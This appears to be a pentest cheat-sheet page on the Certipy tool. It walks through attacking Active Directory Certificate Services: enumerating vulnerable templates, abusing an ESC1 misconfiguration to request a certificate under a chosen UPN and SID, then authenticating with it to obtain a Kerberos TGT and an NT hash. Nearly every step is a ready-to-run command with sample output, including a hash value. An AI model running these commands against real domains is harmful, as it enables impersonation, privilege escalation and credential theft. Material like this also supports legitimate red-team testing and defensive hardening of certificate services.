# certipy-Ad

{% embed url="<https://github.com/ly4k/Certipy/wiki>" %}

## **Enumerate AD CS**

The attacker runs `certipy find` to discover any vulnerable configuration.

```sh
certipy-ad find -u '<user>@<domain>' -p '<pass>' -dc-ip '<ip>' -text -enabled -hide-admins
```

## **Request a certificate**

Suppose the `find` output shows **ESC1** on a template that domain users can enroll in. The attacker can attempt to exploit it:

```sh
certipy-ad req -u '<user>@<domain>' -p '<pass>' -dc-ip '<ip>' -target 'CA.CORP.LOCAL' -ca 'CORP-CA' -template '<UserTemplate>' -upn '<user>@<domain>' -sid '<sid>'

[*] Requesting certificate via RPC
[*] Request ID is 1
[*] Successfully requested certificate
[*] Got certificate with UPN '<user>@<domain>'
[*] Certificate object SID is '<sid>'
[*] Wrote certificate and private key to '<user>.pfx'
```

## **Authenticate with the certificate**

```sh
certipy-ad auth -pfx '<user>.pfx' -dc-ip '<ip>'

[*] Certificate identities:
    SAN UPN: '<user>@<domain>'
    Security Extension SID: '<sid>'
[*] Using principal: '<user>@<domain>'
[*] Trying to get TGT...
[*] Got TGT
[*] Wrote credential cache to '<user>.ccache'
[*] Trying to retrieve NT hash for '<user>'
[*] Got hash for '<user>@<domain>':
    aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889
```
